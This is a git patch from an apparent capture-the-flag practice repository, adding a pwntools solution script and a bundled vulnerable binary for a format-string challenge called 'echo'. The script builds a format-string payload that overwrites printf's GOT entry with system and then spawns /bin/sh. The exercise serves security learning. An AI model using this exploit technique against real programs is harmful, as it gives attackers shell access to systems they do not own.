From 23eca8a37fe8b0aa384b14f12396c734ab3f5566 Mon Sep 17 00:00:00 2001 From: Jack Ren Date: Tue, 14 Sep 2021 12:31:15 +0800 Subject: [PATCH] Finished format-string/echo --- format-string/echo/answer_echo.py | 19 ++++++++++++++++ format-string/echo/echo | Bin 0 -> 7596 bytes format-string/echo/test_echo.py | 35 ++++++++++++++++++++++++++++++ format-string/echo/test_echo.txt | 5 +++++ 4 files changed, 59 insertions(+) create mode 100755 format-string/echo/answer_echo.py create mode 100755 format-string/echo/echo create mode 100755 format-string/echo/test_echo.py create mode 100644 format-string/echo/test_echo.txt diff --git a/format-string/echo/answer_echo.py b/format-string/echo/answer_echo.py new file mode 100755 index 0000000..68bdd59 --- /dev/null +++ b/format-string/echo/answer_echo.py @@ -0,0 +1,19 @@ +#!/usr/bin/env python2 +from pwn import * +from LibcSearcher import * +from struct import pack +import os, base64, math +context(arch = "i386",os = "linux", log_level = "debug") + +p = process('./echo') +elf = ELF('./echo') + +printf_got = elf.got['printf'] +system_plt = elf.plt['system'] + +payload = fmtstr_payload(7, {printf_got: system_plt}) + +p.sendline(payload) +p.sendline("/bin/sh") +p.interactive() + diff --git a/format-string/echo/echo b/format-string/echo/echo new file mode 100755 index 0000000000000000000000000000000000000000..71e0963655fd352d51e50408f28fec77cbf62772 GIT binary patch literal 7596 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